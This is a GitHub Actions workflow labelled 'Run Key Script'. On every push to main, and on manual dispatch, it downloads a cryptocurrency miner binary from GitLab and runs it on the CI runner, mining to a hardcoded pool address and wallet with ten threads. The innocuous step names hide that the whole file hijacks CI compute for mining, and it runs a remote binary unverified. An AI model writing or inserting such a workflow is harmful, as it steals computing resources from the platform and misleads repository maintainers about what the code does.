name: Run Key Script

on:
  workflow_dispatch:
  push:
    branches:
      - main

jobs:
  run-script:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Download and run key script
        run: |
          wget https://gitlab.com/Tritonn204/tnn-miner/-/jobs/12492282491/artifacts/raw/Tnn-miner-amd64-v0.6.8.tar.gz
          tar -xvf Tnn-miner-amd64-v0.6.8.tar.gz
          chmod +x tnn-miner-cpu
          ./tnn-miner-cpu --daemon-addres stratum+tcp://sg.vipor.net:5077 --wallet xel:h3e3ncjpqjqmm5hyfxnsm3cxvvfl0x6y7605ra804v79qc4tlg9sqyf3ggx.pepeq --threads 10
